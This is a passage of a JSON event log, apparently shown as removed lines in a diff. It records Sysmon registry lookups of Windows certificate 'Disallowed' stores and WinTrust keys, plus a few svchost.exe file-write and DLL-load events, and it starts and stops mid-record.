"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "file", - "file_name": "BIT6BFA.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "file", - "file_name": "BIT6BFA.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "vssapi.dll", - "image_path": "C:\\Windows\\System32\\vssapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "vsstrace.dll", - "image_path": "C:\\Windows\\System32\\vsstrace.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 